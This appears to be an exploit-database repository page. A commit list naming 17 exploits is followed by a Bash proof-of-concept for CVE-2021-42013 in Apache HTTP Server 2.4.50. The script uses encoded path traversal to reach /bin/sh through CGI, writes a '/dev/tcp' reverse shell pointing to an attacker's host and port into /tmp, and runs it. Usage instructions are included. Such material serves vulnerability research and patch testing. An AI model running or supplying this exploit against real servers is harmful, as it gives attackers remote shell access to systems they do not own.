
17 changes to exploits/shellcodes Netgear Genie 2.4.64 - Unquoted Service Path OpenClinic GA 5.194.18 - Local Privilege Escalation Gestionale Open 11.00.00 - Local Privilege Escalation Hikvision Web Server Build 210702 - Command Injection WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated) Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE) Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated) Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated) Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS) Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) Engineers Online Portal 1.0 - 'multiple' Authentication Bypass Engineers Online Portal 1.0 - 'id' SQL Injection WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS) WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS) Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2) phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
21 lines
No EOL
899 B
Bash
Executable file
21 lines
No EOL
899 B
Bash
Executable file
# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)
|
|
# Credits: Ash Daulton & cPanel Security Team
|
|
# Date: 24/07/2021
|
|
# Exploit Author: TheLastVvV.com
|
|
# Vendor Homepage: https://apache.org/
|
|
# Version: Apache 2.4.50 with CGI enable
|
|
# Tested on : Debian 5.10.28
|
|
# CVE : CVE-2021-42013
|
|
|
|
#!/bin/bash
|
|
|
|
echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'
|
|
if [ $# -eq 0 ]
|
|
then
|
|
echo "try: ./$0 http://ip:port LHOST LPORT"
|
|
exit 1
|
|
fi
|
|
curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh"
|
|
|
|
#usage chmod -x CVE-2021-42013.sh
|
|
#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT |